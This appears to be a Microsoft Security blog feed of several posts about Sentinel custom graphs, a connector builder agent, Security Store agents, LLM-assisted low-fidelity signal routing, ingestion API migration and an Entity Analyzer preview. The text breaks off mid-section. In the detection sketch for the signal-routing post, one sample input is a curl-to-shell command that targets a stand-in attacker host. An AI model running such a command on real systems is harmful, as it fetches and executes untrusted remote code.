Announcing public preview of custom graphs in Microsoft Sentinel
Security attacks span identities, devices, resources, and activity, making it critical to understand how these elements connect to expose real risk. In November, we shared how Sentinel graph brings these signals together into a relationship-aware view to help uncover hidden security risks. We’re excited to announce the public preview of custom graphs in Sentinel, available starting April 1st. Custom graphs let defenders model relationships that are unique to their organization, then run graph analytics to surface blast radius, attack paths, privilege chains, chokepoints, and anomalies that are difficult to spot in tables alone. In this post, we’ll cover what custom graphs are, how they work, and how to get started so the entire team can use them.

Custom graphs

Security data is inherently connected: a sign-in leads to a token, a token touches a workload, a workload accesses data, and data movement triggers new activity. Graphs represent these relationships as nodes (entities) and edges (relationships), helping you answer questions like: “Who received the phishing email, who clicked, and which clicks were allowed by the proxy?” or “Show me users who exported notebooks, staged files in storage, then uploaded data to personal cloud storage – the full, three‑phase exfiltration chain through one identity.”

With custom graphs, security teams can build, query, and visualize tailored security graphs using data from the Sentinel data lake and non-Microsoft sources, powered by Fabric. By uncovering hidden patterns and attack paths, graphs provide the relationship context needed to surface real risk. This context strengthens AI‑powered agent experiences, speeds investigations, clarifies blast radius, and helps teams move from noisy, disconnected alerts to confident decisions.

In the words of our preview customers:

“We ingested our Databricks management-plane telemetry into the Sentinel data lake and built a custom security graph. Without writing a single detection rule, the graph surfaced unusual patterns of activity and overprivileged access that we escalated for investigation. We didn't know what we were looking for, the graph surfaced the risk for us by revealing anomalous activity patterns and unusual access combinations driven by relationships, not alerts.” – SVP, Security Solutions | Financial Services organization

Use cases

Sentinel graph offers embedded, Microsoft-managed security graphs in Defender and Microsoft Purview experiences to help you at every stage of defense, from pre-breach to post-breach and across assets, activities, and threat intelligence. See here for more details. The new custom graph capability gives you full control to create your own graphs combining data from Microsoft sources, non-Microsoft sources, and federated sources in the Sentinel data lake. With custom graphs you can:

- Understand blast radius – Trace phishing campaigns, malware spread, OAuth abuse, or privilege escalation paths across identities, devices, apps, and data, without stitching together dozens of tables.
- Reconstruct real attack chains – Model multi-step attacker behavior (MITRE techniques, lateral movement, before/after malware) as connected sequences so investigations are complete and explainable, not a set of partial pivots. Reconstruct these chains from historical data in the Sentinel data lake.
Figure 2: Drill into which specific MITRE techniques each IP is executing and in which tactic category

- Spot hidden risks and anomalies – Detect structural outliers like users with unusually broad access, anomalous email exfiltration, or dangerous permission combinations that are invisible in flat logs.

Figure 3: OAuth consent chain – a single compromised user consented to four dangerous permissions

Creating custom graphs

Using the Sentinel VS Code extension, you can generate graphs to validate hunting hypotheses, such as understanding attack paths and blast radius of a phishing campaign, reconstructing multi‑step attack chains, and identifying structurally unusual or high‑risk behavior, making it accessible to your team and AI agents. Once persisted via a scheduled job, you can access these custom graphs from the ready-to-use area of the Graphs section in the Defender portal.

Figure 4: Use AI-assisted vibe coding in Visual Studio Code to create tailored security graphs powered by Sentinel data lake and Fabric

Graphs experience in the Microsoft Defender portal

After creating your custom graphs, you can access them in the Graphs section of the Microsoft Defender portal under Sentinel. From there, you can perform interactive, graph-based investigations, for example, using a graph built for phishing analysis to quickly evaluate the impact of a recent incident, profile the attacker, and trace paths across Microsoft telemetry and third-party data. The graph experience lets you run Graph Query Language (GQL) queries (see the illustrative query below), view the graph schema, visualize results, see results in a table, and interactively traverse to the next hop with a single click.

Figure 5: Query, visualize, and traverse custom graphs with the new graph experience in Sentinel
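To make the query experience concrete, here is a minimal, illustrative GQL query against a hypothetical phishing graph. The node labels, edge labels, and property names are assumptions for this sketch; yours will depend on how your custom graph models the underlying tables.

```
// Who received the phishing email, who clicked, and which clicks did the proxy allow?
// Labels (Email, User, Url) and properties (campaign, proxyAction) are hypothetical.
MATCH (e:Email {campaign: 'phish-2026-03'})-[:DELIVERED_TO]->(u:User)-[:CLICKED]->(l:Url)
WHERE l.proxyAction = 'Allowed'
RETURN u.userPrincipalName, l.address
```

From a result like this, a single click on any returned user lets you traverse to the next hop, for example the workloads that identity touched after the click.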
Billing

Custom graph API usage for creating and querying graphs is billed according to the Sentinel graph meter.

Get started

To use custom graphs, you’ll need Microsoft Sentinel data lake enabled in your tenant, since the lake provides the scalable, open-format foundation that custom graphs build on.

- Use the Sentinel data lake onboarding flow to provision the data lake if it isn’t already enabled. Ensure the required connectors are configured to populate your data lake. See Manage data tiers and retention in Microsoft Sentinel | Microsoft Learn.
- Create and persist a custom graph. See Get started with custom graphs in Microsoft Sentinel (preview) | Microsoft Learn.
- Run ad hoc graph queries and visualize graph results. See Visualize custom graphs in Microsoft Sentinel graph (preview) | Microsoft Learn.
- [Optional] Schedule jobs to write graph query results to the lake tier and analytics tier using notebooks. See Exploring and interacting with lake data using Jupyter Notebooks - Microsoft Security | Microsoft Learn.

Learn more

- Earlier posts (Sentinel graph general availability)
- RSAC 2026 announcement roundup
- Custom graphs documentation
- Custom graph billing

Accelerate connectors development using AI agent in Microsoft Sentinel

Today, we’re excited to announce the public preview of the Sentinel connector builder agent, available via the Sentinel VS Code extension, which helps developers build Microsoft Sentinel codeless connectors faster with low-code and AI-assisted prompts. This new capability brings guided workflows directly into the tooling developers already use, helping accelerate time to value as the Sentinel ecosystem continues to grow. Learn more at Create custom connectors using Sentinel connector AI agent.

Why this matters

As the Microsoft Sentinel ecosystem continues to expand, developers are increasingly tasked with delivering high‑quality, production‑ready connectors at a faster pace, often while working across different cloud platforms and development environments. Building these integrations involves coordinating schemas, configuration artifacts, Azure deployment concepts, and validation steps that provide flexibility and control, but can span multiple tools and workflows. As connector development scales across more partners and scenarios, there is a clear opportunity to better integrate these capabilities into the developer environments teams already rely on.

The new Sentinel connector builder agent, using GitHub Copilot in the Sentinel VS Code extension, brings more of the connector development lifecycle -- authoring, validation, testing, and deployment -- into a single, cohesive workflow. By consolidating these common steps, it helps developers move more easily from design to validation and deployment without disrupting established processes.

A guided, AI‑assisted workflow inside VS Code

The Sentinel connector builder agent for Visual Studio Code is designed to help developers move from API documentation to a working codeless connector more efficiently. The experience begins with an ISV's API documentation. Using GitHub Copilot chat inside VS Code, developers can describe the connector they want to build and point the extension to their API docs, either by URL or inline content. From there, the AI‑guided workflow reads and extracts the relevant details needed to begin building the connector.

1. Open the VS Code chat and set the chat to Agent mode.
2. Prompt the agent using @sentinel. When prompted, select /create-connector and select any supported API. For example, for the Contoso API, enter the prompt as:

@sentinel /create-connector Create a connector for Contoso. Here are the API docs: https://contoso-security-api.azurewebsites.net/v0101/api-doc

Next, the agent generates the required artifacts such as polling configurations, data collection rules (DCRs), table schemas, and connector definitions, using guided prompts with built‑in validation (a sketch of one such artifact appears at the end of this section). This step‑by‑step experience helps ensure configurations remain consistent and aligned as they’re created.

Note: During agent evaluation, select Allow responses once to approve changes, or select the option Bypass Approvals in the chat. It might take up to several minutes for the evaluations to finish.

As the connector takes shape, developers can validate and test configurations directly within VS Code, including testing API interactions before deployment. Validation of the API data source and polling configuration is surfaced in context, supporting faster iteration without leaving the development environment. When ready, connectors can be deployed directly from VS Code to accessible Microsoft Sentinel workspaces, streamlining the path from development to deployment without requiring manual navigation of the Azure portal.
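As a point of reference, here is a hedged sketch of roughly what one generated artifact, a custom table schema, can look like. The table name and columns are hypothetical; the agent derives the real schema from the ISV's API documentation.

```python
# Illustrative sketch only: a custom log table schema as the agent might generate it.
# "ContosoEvents_CL" and the columns below are hypothetical examples.
contoso_table_schema = {
    "name": "ContosoEvents_CL",  # custom log tables use the _CL suffix
    "columns": [
        {"name": "TimeGenerated", "type": "datetime"},  # timestamp column
        {"name": "EventType", "type": "string"},
        {"name": "SourceIp", "type": "string"},
        {"name": "Severity", "type": "string"},
    ],
}
```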
Key capabilities

The VS Code connector builder experience includes:

- AI‑guided connector creation to generate codeless connectors from API documentation using natural language prompts.
- Support for common authentication methods, including Basic authentication, OAuth 2.0, and API keys.
- Automated validation to check schemas, cross‑file consistency, and configuration correctness as you build.
- Built‑in testing to validate polling configurations and API interactions before deployment.
- One‑click deployment that allows publishing connectors directly to accessible Microsoft Sentinel workspaces from within VS Code.

Together, these capabilities support a more efficient path from API documentation to a working Microsoft Sentinel connector.

Testimonials

As partners begin using the Sentinel connector builder agent, feedback from the community will help shape future enhancements and refinements. Here is what some of our early adopters have to say about the experience:

“The connector builder agent accelerated our initial exploration of the codeless connector framework and helped guide our connector design decisions.” -- Rodrigo Rodrigues, Technology Alliance Director

“The connector builder agent helped us quickly explore and validate connector options on the codeless connector framework while developing our Sentinel integration.” -- Chris Nicosia, Head of Cloud and Tech Partnerships

Start building

This public preview represents an important step toward simplifying how ISVs build and maintain integrations with Microsoft Sentinel. If you’re ready to get started, the Sentinel connector builder agent is available in public preview for all participants. In the unlikely event that an ISV encounters any issues in building or updating a CCF connector, App Assure is here to help. Reach out to us here.

From Manual Vetting to Continuous Trust: Automating Publisher Screening with AI
Publisher screening is a software supply-chain reality: if a publisher account is compromised, a single update can reach thousands of machines—and recovery is costly. Microsoft Trust & Security Services applies AI to automate screening at onboarding and keep reassessing publishers as new signals appear. Multiple “checker” agents evaluate identity, reputation, and post-approval behavior, then combine evidence into a consistent risk score and an approve/deny/escalate decision, with an evidence-backed explanation that supports auditability and appeals while reducing operational toil.

Strengthening your Security Posture with Microsoft Security Store Innovations at RSAC 2026
Security teams are facing more threats, more complexity, and more pressure to act quickly - without increasing risk or operational overhead. What matters is being able to find the right capability, deploy it safely, and use it where security work already happens. Microsoft Security Store was built with that goal in mind. It provides a single, trusted place to discover, purchase, and deploy Microsoft and partner-built security agents and solutions that extend Microsoft Security - helping you improve protection across SOC, identity, and data protection workflows. Today, the Security Store includes 75+ security agents and 115+ solutions from Microsoft and trusted partners - each designed to integrate directly into Microsoft Security experiences and meet enterprise security requirements.

At RSAC 2026, we’re announcing capabilities that make it easier to turn security intent into action - by improving how you discover agents, how quickly you can put them to use, and how effectively you can apply them across workflows to achieve your security outcomes.

Meet the Next Generation of Security Agents

Security agents are becoming part of day-to-day operations for many teams - helping automate investigations, enrich signals, and reduce manual effort across common security tasks. Since Security Store became generally available, Microsoft and our partners have continued to expand the set of agents that integrate directly with Microsoft Defender, Sentinel, Entra, Purview, Intune and Security Copilot. Some of the notable partner-built agents available through Security Store include:

XBOW Continuous Penetration Testing Agent

XBOW’s penetration testing agents perform pen-tests, analyze findings, and correlate those findings with a customer’s Microsoft Defender detections. XBOW integrates offensive security directly into Microsoft Security workflows by streaming validated, exploitable AppSec findings into Microsoft Sentinel and enabling investigation through XBOW's Copilot agents in Microsoft Defender. With XBOW’s pen-testing agents, offensive security can run continuously to identify which vulnerabilities are actually exploitable, and how to improve posture and detections.

Tanium Incident Scoping Agent

The Tanium Incident Scoping Agent (in preview) brings real-time endpoint intelligence directly into Microsoft Defender and Microsoft Security Copilot workflows. The agent automatically scopes incidents, identifies impacted devices, and surfaces actionable context in minutes - helping teams move faster from detection to containment. By combining Tanium’s real-time intelligence with Microsoft Security investigations, you can reduce manual effort, accelerate response, and maintain enterprise-grade governance and control.

Zscaler

In Microsoft Sentinel, the Zscaler ZIA–ZPA Correlation Agent correlates ZIA and ZPA activity for a given user to speed malsite/malware investigations. It highlights suspicious patterns and recommends ZIA/ZPA policy changes to reduce repeat exposure.

These agents build on a growing ecosystem of Microsoft and partner capabilities designed to work together, allowing you to extend Microsoft Security with specialized expertise where it has the most impact.

Discover and Deploy Agents and Solutions in the Flow of Security Work

Security teams work best when they don’t have to switch tools to make decisions.
That’s why Security Store is embedded directly into Microsoft Security experiences - so you can discover and evaluate trusted agents and solutions in context, while working in the tools you already use. When Security Store became generally available, we embedded it into Microsoft Defender, allowing SOC teams to discover and deploy trusted Microsoft and partner‑built agents and solutions in the middle of active investigations. Analysts can now automate response, enrich investigations, and resolve threats all within the Defender portal. At RSAC, we’re expanding this approach across identity and data security.

Strengthening Identity Security with Security Store in Microsoft Entra

Identity has become a primary attack surface - from fraud and automated abuse to privileged access misuse and posture gaps. Security Store is now embedded in Microsoft Entra, allowing identity and security teams to discover and deploy partner solutions and agents directly within identity workflows. For external and verified identity scenarios, Security Store includes partner solutions that integrate with Entra External ID and Entra Verified ID to help protect against fraud, DDoS attacks, and intelligent bot abuse. These solutions, built by partners such as IDEMIA, AU10TIX, TrueCredential, HUMAN Security, Akamai and Arkose Labs, help strengthen trust while preserving seamless user experiences. For enterprise identity security, more than 15 agents available through the Entra Security Store provide visibility into privileged activity and identity risk, posture health and trends, and actionable recommendations to improve identity security and overall security score. These agents are built by partners such as glueckkanja, adaQuest, Ontinue, BlueVoyant, Invoke, and Performanta. This allows you to extend Entra with specialized identity security capabilities, without leaving the identity control plane.

Extending Data Protection with Security Store in Microsoft Purview

Protecting sensitive data requires consistent controls across where data lives and how it moves. Security Store is now embedded in Microsoft Purview, enabling teams responsible for data protection and compliance to discover partner solutions directly within Purview DLP workflows. Through this experience, you can extend Microsoft Purview DLP with partner data security solutions that help protect sensitive data across cloud applications, enterprise browsers, and networks. These include solutions from Microsoft Entra Global Secure Access and partners such as Netskope, Island, iBoss, and Palo Alto Networks. This experience will be available to customers later this month, as reflected on the M365 roadmap. By discovering solutions in context, teams can strengthen data protection without disrupting established compliance workflows.

Across Defender, Entra, and Purview, purchases continue to be completed through the Security Store website, ensuring a consistent, secure, and governed transaction experience - while discovery and evaluation happen exactly where teams already work.

Outcome-Driven Discovery with Security Store Advisor

As the number of agents and solutions in the Store grows, quickly finding the right fit for your security scenario becomes more important. That’s why we’re introducing the AI‑guided Security Store Advisor, now generally available. You can describe your goal in natural language - such as “investigate suspicious network activity” - and receive recommendations aligned to that outcome.
Advisor also includes side-by-side comparison views for agents and solutions, helping you review capabilities, integrated services, and deployment requirements more quickly and reduce evaluation time. Security Store Advisor is designed with Responsible AI principles in mind, including transparency and explainability. You can learn more about how Responsible AI is applied in this experience in the Security Store Advisor Responsible AI FAQ. Overall, this outcome‑driven approach reduces time to value, improves solution fit, and helps your team move faster from intent to action.

Learning from the Security Community with Ratings and Reviews

Security decisions are strongest when informed by real-world use. This is why we are introducing Security Store ratings and reviews from security professionals who have deployed and used agents and solutions in production environments. These reviews focus on practical considerations such as integration quality, operational impact, and ease of use, helping you learn from peers facing similar security challenges. By sharing feedback, the security community helps raise the bar for quality and enables faster, more informed decisions, so teams can adopt agents and solutions with greater confidence and reduce time to value.

Making agents easier to use post-deployment

Once you’ve deployed your agents, we’re introducing several new capabilities that make it easier to work with them in your daily workflows. These updates help you operationalize agents faster and apply automation where it delivers real value.

- Interactive chat with agents in Microsoft Defender lets SOC analysts ask questions of agents with specialized expertise, such as understanding impacted devices or which vulnerabilities to prioritize, directly in the Defender portal. By bringing a conversational experience with agents into the place where analysts do most of their investigation work, analysts can seamlessly collaborate with agents to improve security.
- Logic App triggers for agents enable security teams to include security agents in their automated, repeatable workflows. With this update, organizations can apply agentic automation to a wider variety of security tasks while integrating with their existing tools and workflows to perform tasks like incident triage and access reviews.
- Product combinations in Security Store make it easier to deploy complete security solutions from a single streamlined flow - whether that includes connectors, SaaS tools, or multiple agents that need to work together. Increasingly, partners are building agents that are adept at using your SaaS security tools and security data to provide intelligent recommendations - this feature helps you deploy them faster with ease.

A Growing Ecosystem Focused on Security Outcomes

As the Security Store ecosystem continues to expand, you gain access to a broader set of specialized agents and solutions that work together to help defend your environment - extending Microsoft Security with partner innovation in a governed and integrated way. At the same time, Security Store provides partners a clear path to deliver differentiated capabilities directly into Microsoft Security workflows, aligned to how customers evaluate, adopt, and use security solutions.

Get Started

Visit https://securitystore.microsoft.com/ to discover security agents and solutions that meet your needs and extend your Microsoft Security investments.
If you’re a partner, visit https://securitystore.microsoft.com/partners to learn how to list your solution or agent and reach customers where security decisions are made.

Where to find us at RSAC 2026

- Security Reborn in the Era of AI workshop: Get hands‑on guidance on building and deploying Security Copilot agents and publishing them to the Security Store. March 23 | 8:00 AM | The Palace Hotel. Register: Security Reborn in the Era of AI | Microsoft Corporate
- Microsoft Security Store: An Inside Look: Join us for a live theater session exploring what’s coming next for Security Store. March 26 | 1:00 PM | Microsoft Security Booth #5744 | North Expo Hall
- Visit us at the Booth: Experience Security Store firsthand - test the experience and connect with experts. Microsoft Booth #1843

The Changing Role of Low-Fidelity (LoFi) Signals in the AI Era
Introduction

Low-fidelity signals—heuristics that are cheap to compute but often ambiguous—have traditionally been viewed as a necessary annoyance in security operations. In high-volume pipelines, even a modest false-positive rate can translate into operational disruption: unnecessary blocks, costly recoveries, customer frustration, and analyst burnout from constant triage. In the supply chain scanning service, operated by the Trust and Security Services group in Microsoft, LoFi signals include URL and certificate reputation, obfuscation and packer detection, multiple YARA rule families, high-impact API usage (for example, TerminateProcess), and vulnerability detections. Any one of these may be noisy—or may correctly flag perfectly legitimate behavior. The key shift in the AI era is to stop treating LoFi hits as verdicts and start using them as decision points: triggers for deeper, contextual analysis.

Two case studies: LoFi signals as routing, not verdicts

Case study 1: URL reputation + LLMs—turning noisy signals into zero-day detections

Our supply-chain scanning pipeline processes billions of files each day across public package registries. About 150 million files are routed through a URL reputation stage that extracts embedded URLs and evaluates them using threat intelligence plus heuristic rules. At this scale, small error rates become unmanageable: “a little noisy” turns into tens of thousands of daily alerts.

Before: Signal overload

Heuristic-only URL reputation produced roughly 40,000 blocking detections per day. Although many were genuine threats, the volume made it difficult to distinguish confirmed malware from false positives with confidence. Multiple heuristic layers provided partial signals, but none reliably produced a high-confidence verdict. As a result, analysts spent substantial time triaging files and tuning detection logic, weighing stricter blocking against the risk of disrupting legitimate packages and missing true malware.

After: LLM-assisted signal refinement

Adding LLM-based contextual analysis on top of URL reputation changed the signal-to-noise ratio. Instead of judging a URL in isolation, the model evaluates how it is used in surrounding code—an install script versus a documentation link, an obfuscated payload download versus a legitimate API call. Outcome: ~2,000× reduction in alerts—down to about 20 high-confidence blocking detections per day—saving substantial analyst time. More importantly, the remaining alerts skew toward true zero-days that other engines in the pipeline were missing. A minimal sketch of this routing pattern follows.
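The sketch below illustrates the LoFi-as-routing pattern in Python. Everything in it is an illustrative stand-in, not the production pipeline: a real system would plug in actual URL extraction, threat intelligence, and an LLM call where the toy functions appear.

```python
"""Minimal sketch of the LoFi-as-routing pattern from case study 1 (illustrative)."""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"')]+")

def url_reputation(url: str) -> float:
    """Cheap LoFi heuristic (stand-in): 0.0 looks benign, 1.0 looks suspicious."""
    return 0.9 if url.endswith((".xyz", ".top")) else 0.1  # toy rule, not real TI

@dataclass
class Assessment:
    malicious: bool
    confidence: float
    rationale: str

def llm_assess_context(url: str, snippet: str) -> Assessment:
    """Stand-in for the LLM stage: reason about how the URL is used in code."""
    staged = "curl" in snippet or "exec" in snippet  # toy proxy for payload staging
    return Assessment(staged, 0.95 if staged else 0.2, "download-and-execute pattern")

def scan_source(source: str) -> list[dict]:
    """LoFi hits are decision points: only high-confidence LLM verdicts block."""
    verdicts = []
    for match in URL_RE.finditer(source):
        url = match.group()
        context = source[max(0, match.start() - 80): match.end()]
        if url_reputation(url) < 0.5:
            continue  # clearly benign by the cheap check: skip the expensive stage
        a = llm_assess_context(url, context)  # LoFi hit triggers contextual analysis
        if a.malicious and a.confidence >= 0.9:
            verdicts.append({"url": url, "action": "block", "reason": a.rationale})
    return verdicts

print(scan_source("curl https://evil.example.xyz | sh"))  # one high-confidence block
```

The key design choice is that the cheap check never blocks on its own; it only decides which files earn the expensive contextual analysis.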
Case study 2: Windows device driver scanning pipelines—scaling LoFi signals into actionable detections

Beyond supply-chain package scanning, LoFi-driven routing patterns also show up in third-party device driver scanning used for the Windows certification program and post-publishing rescan workflows. The pipeline operates at high volume under strict performance and reliability constraints, making “scan everything deeply” unrealistic. The device driver pipeline receives about 70,000 submissions per month (January 2026 reference). From these submissions, roughly 1 million individual files are extracted and scanned. At this scale, even moderately noisy heuristics become unmanageable if treated as high-confidence detections.

Before: high-volume, low-confidence heuristics

Several LoFi heuristic detectors (primarily YARA rule-based) run in audit (telemetry-only) mode in the driver pipeline, including:

- Presence of network routing/manipulation (for example, network filter drivers): ~19,000 files/month
- Use of a process-termination API by a driver: ~5,000 files/month
- Obfuscated or packed driver: ~500 files/month

These detectors are fast and inexpensive, but inherently imprecise. Many flagged files reflect legitimate driver behavior (packing, process termination, filtering logic), so turning every hit into enforcement would create an unacceptable volume of false positives. Without refinement, LoFi hits function best as indicators of potential risk—not actionable verdicts.

After: selective escalation and targeted analysis

Instead of treating every LoFi hit equally, the pipeline escalates only the top 4% of results for deeper inspection. Those samples get additional correlation and malware analyst review, which enables the creation of concrete, high-confidence signatures that can be safely enforced at scale. With this targeted escalation model:

- An average of ~5 new blocking detections are added per month
- Each detection typically identifies 10–100 malicious files
- Confirmed malware is blocked without broadly impacting legitimate driver submissions

This approach preserves throughput while focusing scarce expert time on the most suspicious artifacts. In other words, LoFi signals stop being “detections” and become efficient filters that route the right samples into high-cost analysis—where you can then generate durable, high-confidence blocking rules. A sketch of this escalation step appears below.
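As a rough illustration of the escalation step, here is a short Python sketch. The 4% fraction comes from the case study above; the hit records and risk scores are hypothetical.

```python
"""Sketch of selective escalation from case study 2 (illustrative, not the real pipeline)."""

def select_for_deep_analysis(hits: list[dict], fraction: float = 0.04) -> list[dict]:
    """Escalate only the most suspicious fraction of LoFi hits to analyst review.

    Each hit is expected to carry a heuristic 'risk' score; everything else
    stays in audit/telemetry-only mode rather than becoming an enforcement.
    """
    ranked = sorted(hits, key=lambda h: h["risk"], reverse=True)
    cutoff = max(1, int(len(ranked) * fraction))
    return ranked[:cutoff]  # ~top 4% get correlation + malware-analyst review

# Example: 1,000 LoFi hits -> only ~40 routed to expensive analysis, from which
# a handful of durable, high-confidence blocking signatures emerge.
hits = [{"file": f"driver_{i}.sys", "risk": i / 1000} for i in range(1000)]
print(len(select_for_deep_analysis(hits)))  # 40
```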
Key takeaways

- LoFi is a routing layer. In AI-era pipelines, the goal is not to make every cheap heuristic perfectly precise—it is to use it to decide where to spend expensive compute and analyst time.
- Context beats indicators. LLMs can turn ambiguous URL signals into high-confidence decisions by reasoning about usage and intent, not just matching patterns.
- Escalate a small fraction, learn continuously. Selecting the top few percent for deeper analysis keeps throughput high and creates a feedback loop that produces enforceable signatures.
- Measure success by outcomes. The win is reduced alert volume and improved catch quality (for example, zero-days and durable blocking rules) rather than “more detections.”

Conclusion

As threat actors move faster and zero-days become more common, security systems have to make better decisions under tighter latency and cost constraints. The answer is not to replace LoFi signals with AI everywhere; it is to combine them. Cheap heuristics can cover the full surface area, while AI (and human expertise) is reserved for the small subset of events that truly deserve deeper reasoning. Both case studies illustrate the same pattern. In supply-chain scanning, LLMs transformed a 40,000-per-day alert stream into ~20 high-confidence blocks—surfacing zero-days that were previously lost in the noise. In device driver scanning, selective escalation of the top LoFi hits converts “interesting but unenforceable” heuristics into a steady stream of high-confidence blocking signatures. In practice, the most scalable security posture is a tiered one: LoFi for breadth, AI for context, and analysts for the hardest calls.

Action Required: Transition from HTTP Data Collector API in Microsoft Sentinel

Microsoft Sentinel continues to evolve to provide more secure, scalable, and reliable data ingestion experiences. As part of this evolution, we want to remind customers and partners of an important upcoming change that may impact custom data ingestion and integrations such as detection rules and playbooks.

HTTP Data Collector API will no longer be eligible for incident support after September 2026

Starting September 14, 2026, connectors and tables that rely on the legacy HTTP Data Collector API will no longer be eligible for incident support in Microsoft Sentinel, consistent with Azure’s 2024 announcement. Any data sources, custom integrations, or connectors that continue to rely on the HTTP Data Collector API beyond this date may experience ingestion issues. We highly recommend that customers transition to a supported ingestion alternative before this deadline to avoid any service interruptions.

Who is impacted?

You may be impacted by this change if you are using:

- Custom-built scripts or applications that ingest data using the HTTP Data Collector API.
- Any custom data connectors (likely built as Azure Functions) that use the HTTP Data Collector API.
- Any data connector from the in-product Content Hub, provided by Microsoft or one of our partner ISVs, that still relies on the HTTP Data Collector API (these are being rewritten prior to the API deprecation date).
- Classic custom log tables (usually marked type: Classic) created using the HTTP Data Collector API.

Recommended migration paths

We recommend transitioning to supported, DCR‑based ingestion methods. The appropriate path depends on how data is currently ingested.

1. Update to the latest connector version in Content Hub (recommended for most customers)

For customers using Microsoft or partner‑provided connectors: many existing connectors have been released with new versions using modern ingestion and are available as updated versions in the Content Hub. These newer versions use DCR‑based ingestion and are fully supported.

1.1 Identify the Connector

- Go to the Microsoft Defender portal.
- Navigate to Content Hub.
- Search for the connector you are currently using and check whether it mentions the HTTP Data Collector API.

1.2 Install the New CCF Connector

- Navigate to Content Hub.
- Search for the same connector name.
- Select the version labeled “(via Codeless Connector Framework)”.
- Click Install/Update the CCF connector and complete the setup wizard (authentication, configuration, polling schedule, etc.).

Note: As Microsoft Sentinel transitions to the Codeless Connector Framework (CCF), customers migrating from Azure Functions–based connectors should expect intentional architectural changes. These include new or updated table names and schemas using the Log Ingestion API, and a move to Data Collection Rules (DCRs) and Data Collection Endpoints (DCEs) for modern, governed ingestion. Both connectors may coexist temporarily; installing the CCF connector does not automatically remove the Azure Function connector.

1.3 Validate Data Ingestion

- Confirm new data is flowing into CCF-backed tables (see the sketch after this list).
- Monitor ingestion for a stabilization period (typically several days).
- Validate that logs are flowing as expected, there are no ingestion errors, and the expected log volume is observed.

1.4 Migrate Dependent Content

Update any of your own workloads, outside Microsoft-provided content types, that depend on the old Azure Function–based tables:

- Analytics rules
- Hunting queries
- Workbooks
- Playbooks / automations
- Parsers or custom queries
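To support step 1.3, here is a hedged sketch of a programmatic ingestion check using the Azure Monitor query library. The workspace ID and table name are placeholders for your own values; you can run the equivalent KQL directly in the portal instead.

```python
# Hedged validation sketch: confirm events are landing in the new CCF-backed table.
# pip install azure-identity azure-monitor-query
from datetime import timedelta

from azure.identity import DefaultAzureCredential
from azure.monitor.query import LogsQueryClient

client = LogsQueryClient(DefaultAzureCredential())
response = client.query_workspace(
    workspace_id="<your-workspace-guid>",  # placeholder: your Log Analytics workspace
    query="ContosoEvents_CL | summarize events = count() by bin(TimeGenerated, 1h)",
    timespan=timedelta(days=1),
)
for table in response.tables:
    for row in table.rows:
        print(row)  # hourly event counts; no rows means ingestion isn't flowing yet
```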
2. Logs Ingestion API (for custom applications and direct ingestion)

For customers or ISV partners that ingest data directly into Sentinel tables using custom applications: the Azure Monitor Logs Ingestion API is the supported replacement for the legacy HTTP Data Collector API.

Key benefits:

- Secure, OAuth‑based authentication
- Data Collection Rules (DCRs) for schema control
- Improved reliability, scalability, and governance
- Long‑term platform support

Customers using custom ingestion pipelines should plan to migrate their applications to the Logs Ingestion API prior to the deprecation date. A minimal sketch of what that looks like follows.
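For orientation, here is a hedged sketch of sending custom logs with the Logs Ingestion API via the Python client library. The endpoint, DCR immutable ID, and stream name are placeholders you obtain from your own Data Collection Endpoint and Data Collection Rule.

```python
# Minimal sketch of DCR-based ingestion with the Azure Monitor Logs Ingestion API.
# pip install azure-identity azure-monitor-ingestion
from datetime import datetime, timezone

from azure.identity import DefaultAzureCredential
from azure.monitor.ingestion import LogsIngestionClient

endpoint = "https://my-dce.eastus-1.ingest.monitor.azure.com"  # placeholder DCE URI
client = LogsIngestionClient(endpoint=endpoint, credential=DefaultAzureCredential())

client.upload(
    rule_id="dcr-00000000000000000000000000000000",  # your DCR's immutable ID
    stream_name="Custom-ContosoEvents_CL",           # stream declared in the DCR
    logs=[{
        "TimeGenerated": datetime.now(timezone.utc).isoformat(),
        "EventType": "example",
        "SourceIp": "203.0.113.7",
    }],
)
```

Note the contrast with the legacy API: authentication is OAuth via Microsoft Entra (no shared workspace keys), and the DCR can filter or transform records before they land in the table.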
Migration Benefits (Azure Function → CCF)

- Lower Total Cost of Ownership (TCO), no infrastructure: saves compute cost and eliminates infrastructure maintenance.
- One‑time modernization: clean queries (no type suffixes) and a one‑time migration with no ongoing API churn.
- Built‑in data shaping and quality gates: transformations (filter/modify during ingestion) plus schema validation to enforce ingestion quality.
- Flexible routing and modern tables: multiple destinations (route to multiple tables) with the modern table format for better performance and features.
- Governed and future‑proof ingestion: granular RBAC (DCR + identity control), Sentinel data lake mirroring / lake‑only ingestion, and Microsoft’s supported API going forward.

Summary

The transition from the HTTP Data Collector API to the Azure Monitor Logs Ingestion API is essential to ensure continued data ingestion and improved security. The new API provides key benefits such as OAuth‑based authentication, data filtering and transformation during ingestion, and fine‑grained RBAC. Organizations are strongly encouraged to migrate to the new API ahead of the September 14, 2026 retirement date.

Support Resources: If you are an Independent Software Vendor (ISV) and you encounter any difficulty building your Microsoft Sentinel data connector, Microsoft Security's App Assure program is available to assist. Contact us at AzureSentinelPartner@microsoft.com.

Announcing AI Entity Analyzer in Microsoft Sentinel MCP Server - Public Preview

What is the Entity Analyzer?

Assessing the risk of entities is a core task for SOC teams - whether triaging incidents, investigating threats, or automating response workflows. Traditionally, this has required building complex playbooks or custom logic to gather and analyze fragmented security data from multiple sources. With Entity Analyzer, this complexity starts to fade away. The tool leverages your organization’s security data in Sentinel to deliver comprehensive, reasoned risk assessments for any entity you encounter - starting with users and URLs. By providing this unified, out-of-the-box solution for entity analysis, Entity Analyzer also enables the AI agents you build to make smarter decisions and automate more tasks - without the need to manually engineer risk evaluation logic for each entity type. And for those building SOAR workflows, Entity Analyzer is natively integrated with Logic Apps, making it easy to enrich incidents and automate verdicts within your playbooks.

*Entity Analyzer is rolling out in Public Preview to the Sentinel MCP server and within Logic Apps starting today. Learn more here.
**Leave feedback on the Entity Analyzer here.

Deep Dive: How the User Analyzer is already solving problems for security teams

Problem: Drowning in identity alerts

Security operations centers (SOCs) are inundated with identity-based threats and alert noise. Triaging these alerts requires analyzing numerous data sources across sign-in logs, cloud app events, identity info, behavior analytics, threat intel, and more, all in tandem with each other to reach a verdict - something very challenging to do without a human in the loop today. So, we introduced the User Analyzer, a specialized analyzer that unifies, correlates, and analyzes user activity across all these security data sources.

Government of Nunavut: solving identity alert overload with User Analyzer

Hear from Arshad Sheikh, Security Expert at the Government of Nunavut, on how they're using the User Analyzer today:

How it's making a difference

